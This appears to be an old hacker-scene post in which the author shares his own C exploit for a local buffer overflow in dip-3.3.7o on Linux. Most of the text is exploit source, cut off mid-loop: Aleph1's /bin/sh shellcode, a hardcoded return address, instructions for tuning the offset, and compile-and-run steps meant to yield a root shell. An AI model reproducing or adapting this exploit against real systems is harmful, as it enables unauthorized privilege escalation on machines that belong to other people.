Pjh33r my l33t 0b3rfl0w spl01t! I wrote my own buffer overflow exploit for dip-3.3.7o its an old buffer overflow for linux ~ 1996. Jason you need to connect to the hacker/security stuff. I think you would like it. =) -- larry --------------------------------snip dip-exp.c begin---------------------- /* # This will yeild a local root shell using a buffer overflow in # dip-3.3.7o. try offsets of about -100 to 100 if just doing a # gcc dip-exp.c -o dipex;./dipex # Vapid Labs http://vapid.dhs.org # lwc@vapid.dhs.org Larry W. Cashdollar Linux Slackware 3.?*/ #include #include #define LEN 130 // buffer size #define RET 0xbffffc42 // default return address char shellcode[]= /*Aleph1's shell code. */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc , char *argv[]) { int i; char buffer[LEN]; long retaddr = RET; // our default address to jmp to if (argc > 1) retaddr = retaddr - atoi(argv[1]); printf("Using address %x\n",retaddr); memcpy(buffer,shellcode,strlen(shellcode)); /*copy all the shell code into our buffer*/ for (i=strlen(shellcode);i